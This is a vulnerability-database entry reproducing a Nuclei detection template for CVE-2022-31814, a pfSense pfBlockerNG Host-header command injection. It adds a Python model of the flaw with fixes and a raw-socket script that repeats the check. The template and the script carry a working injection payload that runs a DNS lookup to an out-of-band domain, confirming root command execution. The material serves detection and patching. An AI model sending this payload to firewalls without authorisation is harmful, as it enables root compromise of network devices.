Nuclei template (ProjectDiscovery): NUCLEI:CVE-2022-31814
History: Sep 19, 2022 - 2:12 p.m.

pfSense pfBlockerNG <=2.1.4_26 - OS Command Injection

Published: 2022-09-19 14:12:25
Source: ProjectDiscovery (github.com)
Tags: cve, pfsense, pfblockerng, packetstorm, remote code execution, netgate, os command injection

CVSS3: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
AI Score: 9.7 (Confidence: High)
EPSS: 0.971 (Percentile: 99.8%)

pfSense pfBlockerNG through 2.1.4_26 allows an unauthenticated remote attacker to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header sent to /pfblockerng/www/index.php (CWE-78, OS command injection). NOTE: 3.x is unaffected.
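Added example (not code from this page, from ProjectDiscovery or from pfBlockerNG): a constructed Python model of the bug class, showing why a Host value of the shape `' *; host <oast>; '` breaks out of a hand-quoted shell word, and two ways to close the hole (quote every argument, or validate and drop the shell entirely). The `LOG_SCRIPT` path, the OAST domain and the command shape are assumptions; pfBlockerNG's actual PHP is not reproduced here.

```python
"""Why a Host header can reach a shell, and how to stop it.

Constructed illustration of the bug class behind CVE-2022-31814 (CWE-78).
Model: a request handler logs the client's Host header by splicing it into a
command string handed to /bin/sh. The template's payload closes the single-
quoted word, appends `; host <oast>;` and re-opens a quote so the rest of the
line stays syntactically valid.
"""
import re
import shlex

LOG_SCRIPT = "/usr/local/bin/dnsbl_log_write"            # hypothetical logging helper
TEMPLATE_PAYLOAD = "' *; host abc123.oast.example; '"   # Host value shape from the template; placeholder OAST domain


def build_command_unsafe(host_header: str, client_ip: str) -> str:
    """Vulnerable pattern: quoting by hand, untrusted value inside the quotes."""
    return f"{LOG_SCRIPT} '{host_header}' '{client_ip}'"


def build_command_escaped(host_header: str, client_ip: str) -> str:
    """Still a shell string, but every argument goes through shlex.quote (the
    analogue of PHP's escapeshellarg): an embedded quote can no longer end the word."""
    return f"{LOG_SCRIPT} {shlex.quote(host_header)} {shlex.quote(client_ip)}"


_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# hostname or IPv4 (dotted labels), or a bracketed IPv6 literal, each with optional :port
HOST_RE = re.compile(
    r"^(?:" + _LABEL + r"(?:\." + _LABEL + r")*\.?|\[[0-9A-Fa-f:.]+\])(?::[0-9]{1,5})?$"
)


def is_valid_host_header(value: str) -> bool:
    """Allow-list check for RFC 7230 Host = uri-host [":" port]. Everything the shell
    cares about (quotes, ; | & $ ` and spaces) lies outside this grammar."""
    return len(value) <= 255 and HOST_RE.match(value) is not None


def build_argv_safe(host_header: str, client_ip: str) -> list:
    """Hardened: validate first, then return an argv list for subprocess.run(argv)
    with no shell involved, so there is no command line left to be parsed."""
    if not is_valid_host_header(host_header):
        raise ValueError("Host header is not a valid hostname[:port]; refusing to log it")
    return [LOG_SCRIPT, host_header, client_ip]


def shell_commands(command_line: str) -> list:
    """Approximate what /bin/sh would run: tokenise with POSIX quoting rules and
    split into separate commands at ; | & and parentheses. Enough to show an
    injection; it does not model $(...) or backticks."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # Python 3.8+: split on whitespace and punctuation only
    commands, current = [], []
    for tok in lex:
        if tok and all(ch in ";|&()" for ch in tok):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    ip = "203.0.113.5"  # constructed client address
    print(shell_commands(build_command_unsafe(TEMPLATE_PAYLOAD, ip)))   # three commands, the second is `host ...`
    print(shell_commands(build_command_escaped(TEMPLATE_PAYLOAD, ip)))  # one command, the payload is inert data
    print(build_argv_safe("fw.example.com:443", ip))
```

Running it shows the unquoted build turning one intended command into three, with `host abc123.oast.example` in the middle (the DNS lookup the template's OAST matcher waits for), while the escaped build keeps the whole payload as a single harmless argument. Validation plus an argv list is the preferred fix: it removes the shell rather than trusting the quoting.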
id: CVE-2022-31814

info:
  name: pfSense pfBlockerNG <=2.1.4_26 - OS Command Injection
  author: EvergreenCartoons
  severity: critical
  description: |
    pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to a patched version of pfSense pfBlockerNG (>=2.1.4_27) to mitigate this vulnerability.
  reference:
    - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
    - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
    - https://github.com/EvergreenCartoons/SenselessViolence
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31814
    - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31814
    cwe-id: CWE-78
    epss-score: 0.97252
    epss-percentile: 0.99847
    cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: netgate
    product: pfblockerng
    framework: pfsense
  tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate

http:
  - raw:
      - |+
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |+
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: ' *; host {{interactsh-url}}; '
        Accept: */*

    unsafe: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "GIF")'

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 490a00463044022061419438c8476d852bc22439b5c66b71568aad15d15612a46c47e36f01fe39480220765d71411609420dc5e405527ddf064c99aebf007b49df48f136a41430a61e30:922c64590222798bb761d5b6d8e72950
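Added example, not part of the ProjectDiscovery template: a Python re-implementation of the same two-request check, for re-verifying the finding by hand when nuclei is not available. It sends the benign request, requires the "GIF" body the template's first matcher looks for, sends the injected Host header, and then asks an out-of-band callback whether the OAST domain received a DNS lookup. The target name and port and the OAST domain are placeholders, and the two fake servers at the bottom are constructed stand-ins so the logic runs offline; against a real firewall you would pass `send_raw` and poll your interactsh log inside `dns_seen`.

```python
"""Re-verification of CVE-2022-31814 without nuclei.

Raw sockets are used because the injection lives in the Host header and
high-level HTTP clients tend to reject or normalise a value such as
"' *; host x; '". The OAST side is a callback: in practice you poll your
interactsh/collaborator log for a DNS query to the unique subdomain you used.
"""
import re
import socket
import ssl
from typing import Callable

INDEX_PATH = "/pfblockerng/www/index.php"   # endpoint probed by the template


def build_request(host_header: str) -> bytes:
    """HTTP/1.1 request equivalent to the template's; Host is sent verbatim."""
    return (
        f"GET {INDEX_PATH} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("latin-1")


def injection_host(oast_domain: str) -> str:
    """The template's Host value: closes a quoted shell word, runs `host <oast>`."""
    return f"' *; host {oast_domain}; '"


def send_raw(target: str, port: int, request: bytes, tls: bool = True, timeout: float = 10.0) -> bytes:
    """Send raw bytes to target:port and return the whole response. TLS by default;
    the certificate is not verified because pfSense usually serves a self-signed one."""
    sock = socket.create_connection((target, port), timeout=timeout)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=target)
    with sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def body_of(response: bytes) -> bytes:
    return response.partition(b"\r\n\r\n")[2]


def check_target(send: Callable[[bytes], bytes], target_host: str, oast_domain: str,
                 dns_seen: Callable[[str], bool]) -> dict:
    """Mirror of the template's matchers (matchers-condition: and):
    1) the benign request's body contains "GIF" (the endpoint serves a tracking pixel);
    2) the OAST domain received a DNS lookup after the injected request.
    Use a fresh, unique oast_domain per run, as with a real interactsh session."""
    first = send(build_request(target_host))
    if b"GIF" not in body_of(first):
        return {"endpoint_present": False, "dns_interaction": False, "vulnerable": False}
    send(build_request(injection_host(oast_domain)))
    hit = dns_seen(oast_domain)
    return {"endpoint_present": True, "dns_interaction": hit, "vulnerable": hit}


# --- constructed offline stand-ins: only the shape of the behaviour, not real pfSense code ---
GIF_PIXEL = b"GIF89a\x01\x00\x01\x00"   # the endpoint answers with a 1x1 GIF
FAKE_DNS_LOG = []                        # stands in for the interactsh interaction log


def _host_header(request: bytes) -> str:
    m = re.search(rb"^Host: (.*)\r$", request, re.M)
    return m.group(1).decode("latin-1") if m else ""


def fake_vulnerable_server(request: bytes) -> bytes:
    """Models an unpatched 2.1.4_26: Host reaches a shell, so `; host X;` runs."""
    m = re.search(r";\s*host\s+([^\s;]+)", _host_header(request))
    if m:
        FAKE_DNS_LOG.append(m.group(1))
    return b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\n\r\n" + GIF_PIXEL


def fake_patched_server(request: bytes) -> bytes:
    """Models a patched build: same pixel, Host never reaches a shell."""
    return b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\n\r\n" + GIF_PIXEL


if __name__ == "__main__":
    # Offline demonstration. For a real target: send = lambda r: send_raw("fw.example.com", 443, r)
    seen = lambda d: d in FAKE_DNS_LOG
    print(check_target(fake_vulnerable_server, "fw.example.com", "run1.oast.example", seen))
    print(check_target(fake_patched_server, "fw.example.com", "run2.oast.example", seen))
```

Note that the pixel check alone only proves the pfBlockerNG DNSBL web page is reachable; the verdict comes from the DNS interaction, which is why a unique OAST subdomain per run matters (a stale hit from an earlier run would otherwise be read as a positive).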
